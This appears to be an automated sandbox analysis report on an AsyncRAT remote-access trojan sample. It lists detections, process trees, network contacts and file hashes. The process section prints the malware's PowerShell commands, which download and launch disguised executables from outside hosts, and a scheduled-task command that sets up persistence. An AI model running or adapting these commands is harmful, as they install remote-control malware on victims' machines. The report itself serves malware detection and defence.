Malware Analysis Report

2025-01-02 12:13

Sample ID 240418-bgdrqafh31
Target 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Tags
rat default asyncrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

Threat Level: Known bad

The file 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat

AsyncRat

Asyncrat family

Async RAT payload

Detects executables attemping to enumerate video devices using WMI

Async RAT payload

Detects executables attemping to enumerate video devices using WMI

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-18 01:06

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Detects executables attemping to enumerate video devices using WMI

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-18 01:06

Reported

2024-04-18 01:09

Platform

win7-20240221-en

Max time kernel

151s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Detects executables attemping to enumerate video devices using WMI

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2808 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2520 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2808 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 852 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp90EA.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp

Files

memory/2296-0-0x0000000000010000-0x0000000000028000-memory.dmp

memory/2296-1-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

memory/2296-3-0x000000001AE50000-0x000000001AED0000-memory.dmp

memory/3032-8-0x000000001B180000-0x000000001B462000-memory.dmp

memory/3032-10-0x0000000001E30000-0x0000000001E38000-memory.dmp

memory/3032-9-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

memory/3032-11-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/3032-12-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

memory/3032-13-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/3032-14-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/3032-15-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2296-16-0x0000000076D10000-0x0000000076EB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp90EA.tmp.bat

MD5 00270c5774ea0c6e5949a78b943ccc72
SHA1 18fbc58d6d05b39e8d31553fb2633a8cc528412e
SHA256 321399ceba3456dea60059e4310a6ab9502fef0e52effedb25e09f06e380e4a4
SHA512 3c372bbe5a638d2a15ff1234f1f6052fb8112ffde427399e9388d98cffe58567a865bd62060af4ffeb8d6ee8629416de419ab0f1a3f228bb23cb784a920db489

memory/2296-26-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

memory/2296-27-0x0000000076D10000-0x0000000076EB9000-memory.dmp

memory/3032-28-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 abb2cccc6670a56f36e87fa878aedc5f
SHA1 436a27fca95f2ffa3505d54c282acd7b7bdb91fb
SHA256 1ad53b2adc2a77e07ff102d2c678233fe41c0766208e3815f2b87923633e651b
SHA512 99e1f1b2a2e8860ac9aa952edc6f4c0da961b59fbd168f3fcf7bc8f477073348b3945465e861da5fbb630b88ca5dce468b34ef8886153fbd40ffebecd1bd9c28

memory/2904-34-0x000000001B330000-0x000000001B612000-memory.dmp

memory/2904-35-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2904-37-0x0000000002780000-0x0000000002800000-memory.dmp

memory/2904-36-0x0000000002130000-0x0000000002138000-memory.dmp

memory/2904-39-0x0000000002780000-0x0000000002800000-memory.dmp

memory/2904-40-0x0000000002780000-0x0000000002800000-memory.dmp

memory/2904-38-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2904-41-0x0000000002780000-0x0000000002800000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/852-45-0x0000000000940000-0x0000000000958000-memory.dmp

memory/852-47-0x000007FEEDDE0000-0x000007FEEE7CC000-memory.dmp

memory/852-48-0x0000000002140000-0x00000000021C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/2600-54-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2600-55-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2600-56-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2600-57-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2600-58-0x0000000002900000-0x0000000002980000-memory.dmp

memory/852-59-0x0000000076D10000-0x0000000076EB9000-memory.dmp

memory/2904-60-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-67-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2024-69-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2024-68-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2024-66-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-70-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-71-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/2600-72-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/2024-78-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/788-79-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/788-80-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/788-83-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/788-81-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/788-84-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/852-89-0x000007FEEDDE0000-0x000007FEEE7CC000-memory.dmp

memory/788-90-0x00000000027F0000-0x0000000002870000-memory.dmp

memory/1676-91-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-92-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/1676-93-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-94-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/1676-95-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-96-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/1676-97-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/852-98-0x0000000002140000-0x00000000021C0000-memory.dmp

memory/788-99-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

memory/3028-106-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-105-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

memory/3028-108-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-107-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

memory/3028-110-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-109-0x0000000002590000-0x0000000002610000-memory.dmp

memory/3028-111-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-18 01:06

Reported

2024-04-18 01:09

Platform

win10v2004-20240412-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Detects executables attemping to enumerate video devices using WMI

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\system.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
